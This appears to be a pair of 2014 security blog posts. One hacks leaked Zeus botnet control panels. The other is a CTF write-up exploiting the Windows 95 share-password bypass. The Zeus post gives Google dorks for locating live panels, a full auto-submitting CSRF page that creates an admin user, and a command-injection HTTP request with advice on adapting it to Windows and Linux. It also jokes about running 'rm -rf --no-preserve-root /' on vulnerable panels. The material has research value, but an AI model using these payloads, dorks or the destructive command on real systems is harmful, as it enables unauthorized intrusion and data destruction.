Friday, February 14, 2014

Attacking financial malware botnet panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html>
<head>
    <title></title>
</head>
<body>
    <pre>
  This is a CSRF POC to create a new admin user in Zeus admin panels.
  Username: user_1392719246 Password: admin1
  You might change the URL from 127.0.0.1.
  Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.  
</pre>
<iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>
    <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">
 <input name="name" type="hidden" value="user_1392719246" /> 
 <input name="password" type="hidden" value="admin1" /> 
 <input name="status" type="hidden" value="1" /> 
 <input name="comment" type="hidden" value="PWND!" />
 <input name="r_botnet_bots" type="hidden" value="1" /> 
 <input name="r_botnet_scripts" type="hidden" value="1" /> 
 <input name="r_botnet_scripts_edit" type="hidden" value="1" /> 
 <input name="r_edit_bots" type="hidden" value="1" /> 
 <input name="r_reports_db" type="hidden" value="1" /> 
 <input name="r_reports_db_edit" type="hidden" value="1" /> 
 <input name="r_reports_files" type="hidden" value="1" />
 <input name="r_reports_files_edit" type="hidden" value="1" />
 <input name="r_reports_jn" type="hidden" value="1" /> 
 <input name="r_stats_main" type="hidden" value="1" /> 
 <input name="r_stats_main_reset" type="hidden" value="1" /> 
 <input name="r_stats_os" type="hidden" value="1" /> 
 <input name="r_system_info" type="hidden" value="1" /> 
 <input name="r_system_options" type="hidden" value="1" />
 <input name="r_system_user" type="hidden" value="1" /> 
 <input name="r_system_users" type="hidden" value="1" />
    </form>
<script type="text/javascript">
 window.onload=function(){ 
  var counter = 10;
  var interval = setInterval(function() {
   counter--;
   document.getElementById('countdown').innerHTML = counter;
   if (counter == 0) {
    redirect();
    clearInterval(interval);
   }
  }, 1000);
 };
    function redirect() {
  document.getElementById("csrf-form").submit();
    }
    </script>
</body>
</html>
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - very bad idea. In this case the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
  • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but looks like it has been filtered everywhere. Sad panda.

Whats really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){
   ...
   $archive .= '.zip';
   $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';
   exec($cli, $e, $r);
}

The exploit could not be simpler:
POST /cp.php?m=reports_files&path= HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate, if you know the RC4 key. You can upload a PHP shell :)

Sunday, February 2, 2014

Hacking Windows 95, part 1

During a CTF game we came across very-very old systems. Turns out, it is not that easy to hack those dinosaur old systems, because modern tools like Metasploit do not have sploits for those old boxes and of course our "133t h4cking skillz" are useless without Metasploit... :)

But I had an idea: This can be a pretty good small research for fun.

The rules for the hack are the following:
  1. Only publicly available tools can be used for this hack, so no tool development. This is a CTF for script bunniez, and we can't haz code!
  2. Only hacks without user interaction are allowed (IE based sploits are out of scope).
  3. I need instant remote code execution. For example, if I can drop a malware to the c: drive, and change autoexec.bat, I'm still not done, because no one will reboot the CTF machine in a real CTF for me. If I can reboot the machine, that's OK.
  4. I don't have physical access.
I have chosen Windows 95 for this task. First I had to get a genuine Windows 95 installer, so I visited the Microsoft online shop, and downloaded it from their official site.

I installed it in a virtualized environment (remember, you need a boot floppy to install from the CD), and it hit me with a serious nostalgia bomb after watching the installer screens. "Easier to use", "faster and more efficient", "high-powered performance", "friendly", "intuitive interface". Who does not want that? :)






Now that I have a working Windows 95 box, setting up the TCP/IP is easy, let's try to hack it!

My first tool is always nmap. Let's scan the box! Below I'm showing the interesting parts from the result:

PORT      STATE           SERVICE       VERSION
139/tcp   open            netbios-ssn
137/udp   open|filtered   netbios-ns
138/udp   open|filtered   netbios-dgm
Running: Microsoft Windows 3.X|95
OS details: Microsoft Windows for Workgroups 3.11 or Windows 95
TCP Sequence Prediction: Difficulty=25 (Good luck!)
IP ID Sequence Generation: Broken little-endian incremental

The first interesting thing to note is that there is no port 445! Port 445 is only since NT 4.0. If you check all the famous windows sploits (e.g. MS03-026, MS08-067), all of them use port 445 and named pipes. But there are no named pipes on Windows 95!

Because I'm a Nessus monkey, let's run a free Nessus scan on it!

Only one critical vulnerability found:
Microsoft Windows NT 4.0 Unsupported Installation Detection

Thanks for the nothing, Nessus! But at least it was for free.

Next I tried GFI Languard, nothing. It detected the machine as Win95, the opened TCP port, and some UDP ports as open (false-positive), and that's all...

Let's try another free vulnerability scanner tool, Nexpose. The results are much better:
  • CIFS NULL Session Permitted  
  • Weak LAN Manager hashing permitted
  • SMB signing not required
  • Windows 95/98/ME Share Level Password Bypass   
  • TCP Sequence Number Approximation Vulnerability  
  • ICMP netmask response
  • CIFS Share Readable By Everyone
I think the following vulnerabilities are useless for me at the moment:
  • Weak LAN Manager hashing permitted - without user interaction or services looking at the network, useless (I might be wrong here, will check this later)
  • TCP Sequence Number Approximation Vulnerability - not interesting
  • ICMP netmask response - not interesting
  • CIFS Share Readable By Everyone - unless there is a password in a text file, useless
But we have two interesting vulns:
  • CIFS NULL Session Permitted  - this could be interesting, I will check this later ...
  • Windows 95/98/ME Share Level Password Bypass - BINGO!
Let me quote Nexpose here:

"3.2.3 Windows 95/98/ME Share Level Password Bypass (cifs-win9x-onebyte-password)

A flaw in the Windows 95/98/ME File and Print Sharing service allows unauthorized users to access file and print shares by sending the first character of the password. Due to the limited number of attempts required to guess the password, brute force attacks can be performed in just a few seconds.

Established connection to share TEST with password P"

The vulnerability description at MS side:

For example if the password is "Password" (without quotes) and the client sends the password "P" (without quotes) and the length of 1, the client is authenticated. To find the rest of the password, the attacker increments the length to 2 and starts guessing the second letter until he reaches "PA" and gets authenticated again. As share passwords in Windows 95 are not case sensitive, "Pa" and "PA" will also be accepted. The attacker can continue to increment the length and guessing the next letter one-by-one until he gets the full "PASSWORD" (as the maximum length is 8 characters).

I believe all characters between ALT+033 and ALT+255 can be used in the share password in Windows 95, but as it is case insensitive, we have 196 characters to use, and a maximum length of 8 characters. In worst case this means that we can guess the full password in 1568 requests. The funny thing is that the share password is not connected to (by default) any username/account, and it cannot be locked via brute force.

Luckily there is a great tool which can exploit this vulnerability:

Let's check this tool in action:


W00t w00t, it brute forced the password in less then 2 seconds!

Looking at a wireshark dump we can see how it is done:


As you can see, in the middle of the dump we can see that it already guessed the part "PASS" and it is brute-forcing the fifth character, it founds that "W" is the correct fifth character, and starts brute-forcing the sixth character.

If we are lucky with the CTF, the whole C:\ drive is shared with full read-write access, and we can write our team identifier into the c:\flag.txt. But what if we want remote code execution? Stay tuned, this is going to be the topic of the next part of this post.